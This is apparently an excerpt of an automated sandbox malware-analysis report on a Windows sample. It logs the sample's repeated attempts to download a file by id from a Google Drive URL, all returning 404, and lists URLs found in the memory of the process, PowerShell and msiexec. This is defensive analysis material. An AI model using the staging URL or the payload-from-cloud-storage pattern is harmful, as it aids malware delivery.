      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRX17UL1fI3hB9uxb9tb8WTFUeOuyCytY7JLGw-4cNACo3RW9cbLSYAep7ywKG2842vContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:34:52 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-s5g4_WbCwxZQRYwKrI0HIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=UJgGxGwMnnh5Hkc-ik75gM3Svtpnr--_rN73_GXA07ErE3YsRuTenh60_uQGSQIhgo_KvKCfneQuxRU7gT9EmgpqfdaGl7US166Um97Q4F_7dXrNAey74Z47wNbvT3rsGVEFFuTM4llM91_vUTwgDg6mTDdEtajw_W6LHyfOsZXJKGG4NpxgOS0p; expires=Sun, 13-Jul-2025 03:34:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT8Vmv0AlaY1BllZklbRFNltP7n0ZDbTXue7bv3YGLhpZ1CXjcphwpQoS-1jH48m8gQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:35:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-EK_7LpaHiczjIpREZw8K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSZhZJgL3s8-ZzLMrmkLlDl3KAEoz3L-Dh8YUbJqLebUHiRPwCb7ZdjFe66S9unmbQNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:35:16 GMTContent-Security-Policy: script-src 'nonce-SVQ9pgjJG_R5fTc4_TV8rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQQpwiaxd-uF1uxgCyhpihgl_08KnbsAuan6Ld0Bj9PsNnrlpLYzMPVTokNG_SoUlBHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:35:29 GMTContent-Security-Policy: script-src 'nonce-fSC-Yk1TLtLhJkHZDmoHOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTHA9CgGaP4y0slLmXOP4oD-biiFoJmYwnJH5eHjexTjJIiwBXQs0QZJHIGPUHENY2DContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:35:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5uS7Hw1NVV_5mLJLt-MUgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQA-T4nkc0BwFfAmhjw1HDWsVgNcWHDNM_MGPC7LSnBm9gUTcmY_OboYX6c0htUiVlzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:35:53 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-DQvb78jy30Klll2hUbmjYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSkIiOjvxOkBjcDTPnVKwR1zVPNEMCwovW_WM8ns11gicG-RN5xMMcgMhxCiO9rpnlDjwfRV0sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:36:05 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-mS0Zh3JswFLM1R3f8BCaNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4oDPtqbBoUsR4Mti_r6LvSWQtk68nLrRhg3LHjZYzY7SOrtQ4Za-75HCvNp4oy25NytQkgZg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:36:17 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Amm1HqpBSH0d6hU5XqFs6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQB3PWRwQj0xG4b4R_WdMa3VpXfeGxaHfHpdO6TVJB23wTKsXi4hEMZcDzAQkKT-QMOt9Tz5vkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:36:29 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-YM2cTR2qWgT4dOSpr51Sig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxgGugA9uADex8NYgpVNhJqhaNe4icMWj4LVmTU-4F9awY1fqXY6t9-46hYRn3iohRxrAihvQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:36:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wH5_hmduBPnj1W5p_XLs8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: yMXFgPOdf2.exe, yMXFgPOdf2.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
      Source: powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
